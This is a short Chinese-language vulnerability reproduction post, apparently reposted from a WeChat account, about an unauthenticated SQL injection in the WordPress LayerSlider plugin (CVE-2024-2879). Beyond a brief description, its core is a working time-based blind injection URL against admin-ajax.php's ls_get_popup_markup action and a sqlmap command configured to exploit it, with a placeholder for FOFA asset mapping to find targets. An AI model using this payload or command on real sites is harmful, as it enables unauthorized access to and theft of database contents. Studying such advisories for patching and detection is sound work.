WordPress-LayerSlider存在SQL注入漏洞(CVE-2024-2879)

admin
admin
admin
102611
文章
87
评论
2024年4月9日14:16:24评论25 views字数 435阅读1分27秒阅读模式

 

漏洞描述

由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过ls_get_popup_markup操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。

资产测绘

FOFA:

漏洞复现

http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq

sqlmap "https:://ip/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T



原文始发于微信公众号(漏洞文库):【漏洞复现】WordPress-LayerSlider存在SQL注入漏洞(CVE-2024-2879)




 


 



    

  • 
左青龙

    • 

  • 微信扫一扫
    • 

  • 
weinxin

    • 



    

  • 
右白虎

    • 

  • 微信扫一扫
    • 

  • 
weinxin

    • 
























admin 
    

  • 本文由  发表于 2024年4月9日14:16:24
    • 

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  
WordPress-LayerSlider存在SQL注入漏洞(CVE-2024-2879)https://cn-sec.com/archives/2640523.html

    • 














 











 















发表评论

匿名网友
填写信息